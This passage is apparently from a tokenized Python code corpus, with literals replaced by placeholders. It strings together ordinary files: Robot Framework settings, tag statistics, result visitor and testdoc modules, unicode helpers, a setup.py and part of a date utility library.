dirname ( path ) , type_ ) <EOL> return path <EOL> def _process_output_name ( self , name , type_ ) : <EOL> base , ext = os . path . splitext ( name ) <EOL> if self [ '<STR_LIT>' ] : <EOL> base = '<STR_LIT>' % ( base , utils . get_start_timestamp ( '<STR_LIT>' , '<STR_LIT:->' , '<STR_LIT>' ) ) <EOL> ext = self . _get_output_extension ( ext , type_ ) <EOL> return base + ext <EOL> def _get_output_extension ( self , ext , type_ ) : <EOL> if ext != '<STR_LIT>' : <EOL> return ext <EOL> if type_ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return '<STR_LIT>' <EOL> if type_ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return '<STR_LIT>' <EOL> if type_ == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> raise FrameworkError ( "<STR_LIT>" % type_ ) <EOL> def _create_output_dir ( self , path , type_ ) : <EOL> try : <EOL> if not os . path . exists ( path ) : <EOL> os . makedirs ( path ) <EOL> except EnvironmentError , err : <EOL> raise DataError ( "<STR_LIT>" <EOL> % ( type_ . lower ( ) , path , err . strerror ) ) <EOL> def _process_metadata_or_tagdoc ( self , value ) : <EOL> value = value . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> if '<STR_LIT::>' in value : <EOL> return value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return value , '<STR_LIT>' <EOL> def _process_report_background ( self , colors ) : <EOL> if colors . count ( '<STR_LIT::>' ) not in [ <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> LOGGER . error ( "<STR_LIT>" % colors ) <EOL> return self . _get_default_value ( '<STR_LIT>' ) <EOL> colors = colors . split ( '<STR_LIT::>' ) <EOL> if len ( colors ) == <NUM_LIT:2> : <EOL> return colors [ <NUM_LIT:0> ] , colors [ <NUM_LIT:0> ] , colors [ <NUM_LIT:1> ] <EOL> return tuple ( colors ) <EOL> def _process_tag_stat_combine ( self , value ) : <EOL> for replwhat , replwith in [ ( '<STR_LIT:&>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> value = value . 
replace ( replwhat , replwith ) <EOL> if '<STR_LIT::>' not in value : <EOL> return value , '<STR_LIT>' <EOL> pattern , title = value . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return pattern , title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> def _process_tag_stat_link ( self , value ) : <EOL> tokens = value . split ( '<STR_LIT::>' ) <EOL> if len ( tokens ) >= <NUM_LIT:3> : <EOL> return tokens [ <NUM_LIT:0> ] , '<STR_LIT::>' . join ( tokens [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) , tokens [ - <NUM_LIT:1> ] <EOL> LOGGER . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % value ) <EOL> return None <EOL> def _convert_to_positive_integer_or_default ( self , name , value ) : <EOL> value = self . _convert_to_integer ( name , value ) <EOL> return value if value > <NUM_LIT:0> else self . _get_default_value ( name ) <EOL> def _convert_to_integer ( self , name , value ) : <EOL> try : <EOL> return int ( value ) <EOL> except ValueError : <EOL> LOGGER . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name . lower ( ) , value ) ) <EOL> return self . _get_default_value ( name ) <EOL> def _get_default_value ( self , name ) : <EOL> return self . _cli_opts [ name ] [ <NUM_LIT:1> ] <EOL> def _split_args_from_name_or_path ( self , name ) : <EOL> if '<STR_LIT::>' not in name or os . path . exists ( name ) : <EOL> args = [ ] <EOL> else : <EOL> args = name . split ( '<STR_LIT::>' ) <EOL> name = args . pop ( <NUM_LIT:0> ) <EOL> if len ( name ) == <NUM_LIT:1> and args [ <NUM_LIT:0> ] . startswith ( ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) ) : <EOL> name = name + '<STR_LIT::>' + args . pop ( <NUM_LIT:0> ) <EOL> if os . path . exists ( name ) : <EOL> name = os . path . abspath ( name ) <EOL> return name , args <EOL> def __contains__ ( self , setting ) : <EOL> return setting in self . _cli_opts <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( '<STR_LIT>' % ( name , self . _opts [ name ] ) <EOL> for name in sorted ( self . 
_opts ) ) <EOL> @ property <EOL> def output ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def log ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def report ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> @ property <EOL> def xunit ( self ) : <EOL> return self . _get_file ( '<STR_LIT>' ) <EOL> def _get_file ( self , name ) : <EOL> value = self [ name ] <EOL> return value if value != '<STR_LIT>' else None <EOL> @ property <EOL> def split_log ( self ) : <EOL> return self [ '<STR_LIT>' ] <EOL> @ property <EOL> def status_rc ( self ) : <EOL> return not self [ '<STR_LIT>' ] <EOL> class RobotSettings ( _BaseSettings ) : <EOL> _extra_cli_opts = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def is_rebot_needed ( self ) : <EOL> return not ( '<STR_LIT>' == self [ '<STR_LIT>' ] == self [ '<STR_LIT>' ] == self [ '<STR_LIT>' ] ) <EOL> def get_rebot_datasource_and_settings ( self ) : <EOL> datasource = self [ '<STR_LIT>' ] <EOL> settings = RebotSettings ( log = False ) <EOL> settings . _opts . update ( self . _opts ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> del ( settings . _opts [ name ] ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> settings . _opts [ name ] = [ ] <EOL> for name in [ '<STR_LIT:Name>' , '<STR_LIT>' ] : <EOL> settings . _opts [ name ] = None <EOL> settings . _opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> settings . 
_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> settings . _opts [ '<STR_LIT>' ] = self [ '<STR_LIT>' ] <EOL> return datasource , settings <EOL> def _outputfile_disabled ( self , type_ , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return True <EOL> return self . _opts [ '<STR_LIT>' ] == '<STR_LIT>' and type_ != '<STR_LIT>' <EOL> def _escape ( self , value ) : <EOL> return utils . escape ( value ) <EOL> class RebotSettings ( _BaseSettings ) : <EOL> _extra_cli_opts = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) } <EOL> def _outputfile_disabled ( self , type_ , name ) : <EOL> return name == '<STR_LIT>' <EOL> def _escape ( self , value ) : <EOL> return value <EOL> @ property <EOL> def suite_config ( self ) : <EOL> return { <EOL> '<STR_LIT:name>' : self [ '<STR_LIT:Name>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : dict ( self [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] <EOL> } <EOL> @ property <EOL> def statistics_config ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] , <EOL> } <EOL> @ property <EOL> def log_config ( self ) : <EOL> if not self . 
log : <EOL> return { } <EOL> return { <EOL> '<STR_LIT:title>' : utils . html_escape ( self [ '<STR_LIT>' ] or '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _url_from_path ( self . log , self . report ) , <EOL> '<STR_LIT>' : os . path . basename ( os . path . splitext ( self . log ) [ <NUM_LIT:0> ] ) , <EOL> '<STR_LIT>' : self [ '<STR_LIT>' ] <EOL> } <EOL> @ property <EOL> def report_config ( self ) : <EOL> if not self . report : <EOL> return { } <EOL> return { <EOL> '<STR_LIT:title>' : utils . html_escape ( self [ '<STR_LIT>' ] or '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _url_from_path ( self . report , self . log ) , <EOL> '<STR_LIT>' : self . _resolve_background_colors ( ) , <EOL> } <EOL> def _url_from_path ( self , source , destination ) : <EOL> if not destination : <EOL> return None <EOL> return utils . get_link_path ( destination , os . path . dirname ( source ) ) <EOL> def _resolve_background_colors ( self ) : <EOL> colors = self [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : colors [ <NUM_LIT:0> ] , '<STR_LIT>' : colors [ <NUM_LIT:1> ] , '<STR_LIT>' : colors [ <NUM_LIT:2> ] } </s>
<s> def none_shall_pass ( who ) : <EOL> if who is not None : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' </s>
<s> import re <EOL> from robot . utils import NormalizedDict <EOL> from . criticality import Criticality <EOL> from . stats import TagStat , CombinedTagStat <EOL> from . tags import TagPatterns <EOL> class TagStatistics ( object ) : <EOL> def __init__ ( self , combined_stats ) : <EOL> self . tags = NormalizedDict ( ignore = [ '<STR_LIT:_>' ] ) <EOL> self . combined = combined_stats <EOL> def visit ( self , visitor ) : <EOL> visitor . visit_tag_statistics ( self ) <EOL> def __iter__ ( self ) : <EOL> return iter ( sorted ( self . tags . values ( ) + self . combined ) ) <EOL> class TagStatisticsBuilder ( object ) : <EOL> def __init__ ( self , criticality = None , included = None , excluded = None , <EOL> combined = None , docs = None , links = None ) : <EOL> self . _included = TagPatterns ( included ) <EOL> self . _excluded = TagPatterns ( excluded ) <EOL> self . _info = TagStatInfo ( criticality , docs , links ) <EOL> self . stats = TagStatistics ( self . _info . get_combined_stats ( combined ) ) <EOL> def add_test ( self , test ) : <EOL> self . _add_tags_to_statistics ( test ) <EOL> self . _add_to_combined_statistics ( test ) <EOL> def _add_tags_to_statistics ( self , test ) : <EOL> for tag in test . tags : <EOL> if self . _is_included ( tag ) : <EOL> if tag not in self . stats . tags : <EOL> self . stats . tags [ tag ] = self . _info . get_stat ( tag ) <EOL> self . stats . tags [ tag ] . add_test ( test ) <EOL> def _is_included ( self , tag ) : <EOL> if self . _included and not self . _included . match ( tag ) : <EOL> return False <EOL> return not self . _excluded . match ( tag ) <EOL> def _add_to_combined_statistics ( self , test ) : <EOL> for comb in self . stats . combined : <EOL> if comb . match ( test . tags ) : <EOL> comb . add_test ( test ) <EOL> class TagStatInfo ( object ) : <EOL> def __init__ ( self , criticality = None , docs = None , links = None ) : <EOL> self . _criticality = criticality or Criticality ( ) <EOL> self . 
_docs = [ TagStatDoc ( * doc ) for doc in docs or [ ] ] <EOL> self . _links = [ TagStatLink ( * link ) for link in links or [ ] ] <EOL> def get_stat ( self , tag ) : <EOL> return TagStat ( tag , self . get_doc ( tag ) , self . get_links ( tag ) , <EOL> self . _criticality . tag_is_critical ( tag ) , <EOL> self . _criticality . tag_is_non_critical ( tag ) ) <EOL> def get_combined_stats ( self , combined = None ) : <EOL> return [ self . get_combined_stat ( * comb ) for comb in combined or [ ] ] <EOL> def get_combined_stat ( self , pattern , name = None ) : <EOL> name = name or pattern <EOL> return CombinedTagStat ( pattern , name , self . get_doc ( name ) , <EOL> self . get_links ( name ) ) <EOL> def get_doc ( self , tag ) : <EOL> return '<STR_LIT>' . join ( doc . text for doc in self . _docs if doc . match ( tag ) ) <EOL> def get_links ( self , tag ) : <EOL> return [ link . get_link ( tag ) for link in self . _links if link . match ( tag ) ] <EOL> class TagStatDoc ( object ) : <EOL> def __init__ ( self , pattern , doc ) : <EOL> self . _matcher = TagPatterns ( pattern ) <EOL> self . text = doc <EOL> def match ( self , tag ) : <EOL> return self . _matcher . match ( tag ) <EOL> class TagStatLink ( object ) : <EOL> _match_pattern_tokenizer = re . compile ( '<STR_LIT>' ) <EOL> def __init__ ( self , pattern , link , title ) : <EOL> self . _regexp = self . _get_match_regexp ( pattern ) <EOL> self . _link = link <EOL> self . _title = title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> def match ( self , tag ) : <EOL> return self . _regexp . match ( tag ) is not None <EOL> def get_link ( self , tag ) : <EOL> match = self . _regexp . match ( tag ) <EOL> if not match : <EOL> return None <EOL> link , title = self . _replace_groups ( self . _link , self . _title , match ) <EOL> return link , title <EOL> def _replace_groups ( self , link , title , match ) : <EOL> for index , group in enumerate ( match . 
groups ( ) ) : <EOL> placefolder = '<STR_LIT>' % ( index + <NUM_LIT:1> ) <EOL> link = link . replace ( placefolder , group ) <EOL> title = title . replace ( placefolder , group ) <EOL> return link , title <EOL> def _get_match_regexp ( self , pattern ) : <EOL> pattern = '<STR_LIT>' % '<STR_LIT>' . join ( self . _yield_match_pattern ( pattern ) ) <EOL> return re . compile ( pattern , re . IGNORECASE ) <EOL> def _yield_match_pattern ( self , pattern ) : <EOL> for token in self . _match_pattern_tokenizer . split ( pattern ) : <EOL> if token . startswith ( '<STR_LIT:?>' ) : <EOL> yield '<STR_LIT>' % ( '<STR_LIT:.>' * len ( token ) ) <EOL> elif token == '<STR_LIT:*>' : <EOL> yield '<STR_LIT>' <EOL> else : <EOL> yield re . escape ( token ) </s>
<s> from robot . model import SuiteVisitor <EOL> class ResultVisitor ( SuiteVisitor ) : <EOL> def visit_result ( self , result ) : <EOL> if self . start_result ( result ) is not False : <EOL> result . suite . visit ( self ) <EOL> result . statistics . visit ( self ) <EOL> result . errors . visit ( self ) <EOL> self . end_result ( result ) <EOL> def start_result ( self , result ) : <EOL> pass <EOL> def end_result ( self , result ) : <EOL> pass <EOL> def visit_statistics ( self , stats ) : <EOL> if self . start_statistics ( stats ) is not False : <EOL> stats . total . visit ( self ) <EOL> stats . tags . visit ( self ) <EOL> stats . suite . visit ( self ) <EOL> self . end_statistics ( stats ) <EOL> def start_statistics ( self , stats ) : <EOL> pass <EOL> def end_statistics ( self , stats ) : <EOL> pass <EOL> def visit_total_statistics ( self , stats ) : <EOL> if self . start_total_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_total_statistics ( stats ) <EOL> def start_total_statistics ( self , stats ) : <EOL> pass <EOL> def end_total_statistics ( self , stats ) : <EOL> pass <EOL> def visit_tag_statistics ( self , stats ) : <EOL> if self . start_tag_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_tag_statistics ( stats ) <EOL> def start_tag_statistics ( self , stats ) : <EOL> pass <EOL> def end_tag_statistics ( self , stats ) : <EOL> pass <EOL> def visit_suite_statistics ( self , stats ) : <EOL> if self . start_suite_statistics ( stats ) is not False : <EOL> for stat in stats : <EOL> stat . visit ( self ) <EOL> self . end_suite_statistics ( stats ) <EOL> def start_suite_statistics ( self , stats ) : <EOL> pass <EOL> def end_suite_statistics ( self , suite_stats ) : <EOL> pass <EOL> def visit_stat ( self , stat ) : <EOL> if self . start_stat ( stat ) is not False : <EOL> self . 
end_stat ( stat ) <EOL> def start_stat ( self , stat ) : <EOL> pass <EOL> def end_stat ( self , stat ) : <EOL> pass <EOL> def visit_errors ( self , errors ) : <EOL> self . start_errors ( errors ) <EOL> for msg in errors : <EOL> msg . visit ( self ) <EOL> self . end_errors ( errors ) <EOL> def start_errors ( self , errors ) : <EOL> pass <EOL> def end_errors ( self , errors ) : <EOL> pass </s>
<s> USAGE = """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from os . path import abspath , dirname <EOL> import codecs <EOL> import time <EOL> if '<STR_LIT>' not in sys . modules and __name__ == '<STR_LIT:__main__>' : <EOL> import pythonpathsetter <EOL> from robot import utils <EOL> from robot . running import TestSuite , Keyword <EOL> from robot . conf import RobotSettings <EOL> from robot . parsing import disable_curdir_processing <EOL> from robot . htmldata import HtmlFileWriter , ModelWriter , JsonWriter , TESTDOC <EOL> class TestDoc ( utils . Application ) : <EOL> def __init__ ( self ) : <EOL> utils . Application . __init__ ( self , USAGE , arg_limits = ( <NUM_LIT:2> , ) ) <EOL> def main ( self , args , title = None , ** options ) : <EOL> datasources = args [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> outfile = abspath ( args [ - <NUM_LIT:1> ] ) <EOL> suite = TestSuiteFactory ( datasources , ** options ) <EOL> self . _write_test_doc ( suite , outfile , title ) <EOL> self . console ( outfile ) <EOL> def _write_test_doc ( self , suite , outfile , title ) : <EOL> output = codecs . open ( outfile , '<STR_LIT:w>' , '<STR_LIT>' ) <EOL> model_writer = TestdocModelWriter ( output , suite , title ) <EOL> HtmlFileWriter ( output , model_writer ) . write ( TESTDOC ) <EOL> output . close ( ) <EOL> @ disable_curdir_processing <EOL> def TestSuiteFactory ( datasources , ** options ) : <EOL> if isinstance ( datasources , basestring ) : <EOL> datasources = [ datasources ] <EOL> return TestSuite ( datasources , RobotSettings ( options ) ) <EOL> class TestdocModelWriter ( ModelWriter ) : <EOL> def __init__ ( self , output , suite , title = None ) : <EOL> self . _output = output <EOL> self . _output_path = getattr ( output , '<STR_LIT:name>' , None ) <EOL> self . _suite = suite <EOL> self . _title = title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) if title else suite . name <EOL> def write ( self , line ) : <EOL> self . _output . write ( '<STR_LIT>' + os . 
linesep ) <EOL> self . write_data ( ) <EOL> self . _output . write ( '<STR_LIT>' + os . linesep ) <EOL> def write_data ( self ) : <EOL> generated_time = time . localtime ( ) <EOL> model = { <EOL> '<STR_LIT>' : JsonConverter ( self . _output_path ) . convert ( self . _suite ) , <EOL> '<STR_LIT:title>' : self . _title , <EOL> '<STR_LIT>' : utils . format_time ( generated_time , gmtsep = '<STR_LIT:U+0020>' ) , <EOL> '<STR_LIT>' : long ( time . mktime ( generated_time ) * <NUM_LIT:1000> ) <EOL> } <EOL> JsonWriter ( self . _output ) . write_json ( '<STR_LIT>' , model ) <EOL> class JsonConverter ( object ) : <EOL> def __init__ ( self , output_path = None ) : <EOL> self . _output_path = output_path <EOL> def convert ( self , suite ) : <EOL> return self . _convert_suite ( suite ) <EOL> def _convert_suite ( self , suite ) : <EOL> return { <EOL> '<STR_LIT:source>' : suite . source or '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _get_relative_source ( suite . source ) , <EOL> '<STR_LIT:id>' : suite . id , <EOL> '<STR_LIT:name>' : suite . name , <EOL> '<STR_LIT>' : suite . longname , <EOL> '<STR_LIT>' : self . _html ( suite . doc ) , <EOL> '<STR_LIT>' : [ ( n , self . _html ( v ) ) for n , v in suite . metadata . items ( ) ] , <EOL> '<STR_LIT>' : suite . get_test_count ( ) , <EOL> '<STR_LIT>' : self . _convert_suites ( suite ) , <EOL> '<STR_LIT>' : self . _convert_tests ( suite ) , <EOL> '<STR_LIT>' : list ( self . _convert_keywords ( suite ) ) <EOL> } <EOL> def _get_relative_source ( self , source ) : <EOL> if not source or not self . _output_path : <EOL> return '<STR_LIT>' <EOL> return utils . get_link_path ( source , dirname ( self . _output_path ) ) <EOL> def _html ( self , item ) : <EOL> return utils . html_format ( utils . unescape ( item ) ) <EOL> def _convert_suites ( self , suite ) : <EOL> return [ self . _convert_suite ( s ) for s in suite . suites ] <EOL> def _convert_tests ( self , suite ) : <EOL> return [ self . _convert_test ( t ) for t in suite . 
tests ] <EOL> def _convert_test ( self , test ) : <EOL> return { <EOL> '<STR_LIT:name>' : test . name , <EOL> '<STR_LIT>' : test . longname , <EOL> '<STR_LIT:id>' : test . id , <EOL> '<STR_LIT>' : self . _html ( test . doc ) , <EOL> '<STR_LIT>' : utils . normalize_tags ( test . tags ) , <EOL> '<STR_LIT>' : self . _get_timeout ( test . timeout ) , <EOL> '<STR_LIT>' : list ( self . _convert_keywords ( test ) ) <EOL> } <EOL> def _convert_keywords ( self , item ) : <EOL> if item . setup . name : <EOL> yield self . _convert_keyword ( item . setup , type = '<STR_LIT>' ) <EOL> for kw in getattr ( item , '<STR_LIT>' , [ ] ) : <EOL> yield self . _convert_keyword ( kw ) <EOL> if item . teardown . name : <EOL> yield self . _convert_keyword ( item . teardown , type = '<STR_LIT>' ) <EOL> def _convert_keyword ( self , kw , type = None ) : <EOL> return { <EOL> '<STR_LIT:name>' : kw . _get_name ( kw . name ) if isinstance ( kw , Keyword ) else kw . name , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( kw . args ) , <EOL> '<STR_LIT:type>' : type or { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ kw . type ] <EOL> } <EOL> def _get_timeout ( self , timeout ) : <EOL> try : <EOL> tout = utils . secs_to_timestr ( utils . timestr_to_secs ( timeout . string ) ) <EOL> except ValueError : <EOL> tout = timeout . string <EOL> if timeout . message : <EOL> tout += '<STR_LIT>' + timeout . message <EOL> return tout <EOL> def testdoc_cli ( args ) : <EOL> """<STR_LIT>""" <EOL> TestDoc ( ) . execute_cli ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> testdoc_cli ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> from java . lang import Object , Class <EOL> def unic ( item , * args ) : <EOL> if isinstance ( item , Object ) and not isinstance ( item , Class ) : <EOL> try : <EOL> item = item . toString ( ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> return _unic ( item , * args ) <EOL> elif sys . platform == '<STR_LIT>' : <EOL> def unic ( item , * args ) : <EOL> return _unic ( item , * args ) <EOL> else : <EOL> from unicodedata import normalize <EOL> def unic ( item , * args ) : <EOL> return normalize ( '<STR_LIT>' , _unic ( item , * args ) ) <EOL> def _unic ( item , * args ) : <EOL> try : <EOL> return unicode ( item , * args ) <EOL> except UnicodeError : <EOL> try : <EOL> ascii_text = str ( item ) . encode ( '<STR_LIT>' ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> else : <EOL> return unicode ( ascii_text ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> def safe_repr ( item ) : <EOL> try : <EOL> return unic ( repr ( item ) ) <EOL> except UnicodeError : <EOL> return repr ( unic ( item ) ) <EOL> except : <EOL> return _unrepresentable_object ( item ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> _safe_repr = safe_repr <EOL> def safe_repr ( item ) : <EOL> if isinstance ( item , list ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( safe_repr ( i ) for i in item ) <EOL> ret = _safe_repr ( item ) <EOL> if isinstance ( item , unicode ) and not ret . startswith ( '<STR_LIT:u>' ) : <EOL> ret = '<STR_LIT:u>' + ret <EOL> return ret <EOL> _unrepresentable_msg = u"<STR_LIT>" <EOL> def _unrepresentable_object ( item ) : <EOL> from robot . utils . error import get_error_message <EOL> return _unrepresentable_msg % ( item . __class__ . __name__ , get_error_message ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> from os . path import join , dirname <EOL> LONG_DESCRIPION = """<STR_LIT>""" <EOL> def long_description ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return open ( join ( dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) <EOL> except IOError : <EOL> return LONG_DESCRIPTION <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import calendar <EOL> from . filter import BaseParser , str_tuple <EOL> from . exception import CanNotFormatError , UnexpectedTypeError <EOL> bp = BaseParser . main <EOL> dp = BaseParser . parse_diff <EOL> def parse ( value ) : <EOL> return bp ( value ) <EOL> def count ( value1 , value2 ) : <EOL> _val1 , _val2 = parse ( value1 ) , parse ( value2 ) <EOL> if type ( _val1 ) == type ( _val2 ) : <EOL> return _val1 - _val2 <EOL> else : <EOL> _val1 = _val1 if isinstance ( _val1 , datetime . datetime ) else midnight ( _val1 ) <EOL> _val2 = _val2 if isinstance ( _val2 , datetime . datetime ) else midnight ( _val2 ) <EOL> return _val1 - _val2 <EOL> _date = datetime . date . today ( ) <EOL> _datetime = datetime . datetime . now ( ) <EOL> _year = _date . year <EOL> _month = _date . month <EOL> _day = _date . day <EOL> _SEVEN_DAYS = datetime . timedelta ( days = <NUM_LIT:7> ) <EOL> _ONE_DAY = datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def today ( year = None ) : <EOL> """<STR_LIT>""" <EOL> return datetime . date ( int ( year ) , _date . month , _date . day ) if year else _date <EOL> def tomorrow ( date = None ) : <EOL> """<STR_LIT>""" <EOL> if not date : <EOL> return _date + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> current_date = parse ( date ) <EOL> return current_date + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def yesterday ( date = None ) : <EOL> """<STR_LIT>""" <EOL> if not date : <EOL> return _date - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> current_date = parse ( date ) <EOL> return current_date - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> def daysrange ( first = None , second = None , wipe = False ) : <EOL> """<STR_LIT>""" <EOL> _first , _second = parse ( first ) , parse ( second ) <EOL> ( _start , _end ) = ( _second , _first ) if _first > _second else ( _first , _second ) <EOL> days_between = ( _end - _start ) . days <EOL> date_list = [ _end - datetime . 
timedelta ( days = x ) for x in range ( <NUM_LIT:0> , days_between + <NUM_LIT:1> ) ] <EOL> if wipe and len ( date_list ) >= <NUM_LIT:2> : <EOL> date_list = date_list [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return date_list <EOL> def lastday ( year = _year , month = _month ) : <EOL> """<STR_LIT>""" <EOL> last_day = calendar . monthrange ( year , month ) [ <NUM_LIT:1> ] <EOL> return datetime . date ( year = year , month = month , day = last_day ) <EOL> def midnight ( arg = None ) : <EOL> """<STR_LIT>""" <EOL> if arg : <EOL> _arg = parse ( arg ) <EOL> if isinstance ( _arg , datetime . date ) : <EOL> return datetime . datetime . combine ( _arg , datetime . datetime . min . time ( ) ) <EOL> elif isinstance ( _arg , datetime . datetime ) : <EOL> return datetime . datetime . combine ( _arg . date ( ) , datetime . datetime . min . time ( ) ) <EOL> else : <EOL> return datetime . datetime . combine ( _date , datetime . datetime . min . time ( ) ) <EOL> def before ( base = _datetime , diff = None ) : <EOL> """<STR_LIT>""" <EOL> _base = parse ( base ) <EOL> if isinstance ( _base , datetime . date ) : <EOL> _base = midnight ( _base ) <EOL> if not diff : <EOL> return _base <EOL> result_dict = dp ( diff ) <EOL> for unit in result_dict : <EOL> _val = result_dict [ unit ] <EOL> if not _val : <EOL> continue <EOL> if unit == '<STR_LIT>' : <EOL> _base = _base . replace ( year = ( _base . year - _val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> if _base . month <= _val : <EOL> _month_diff = <NUM_LIT:12> - ( _val - _base . month ) <EOL> _base = _base . replace ( year = _base . year - <NUM_LIT:1> ) . replace ( month = _month_diff ) <EOL> else : <EOL> _base = _base . replace ( month = _base . month - _val ) <EOL> elif unit in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _base = _base - datetime . 
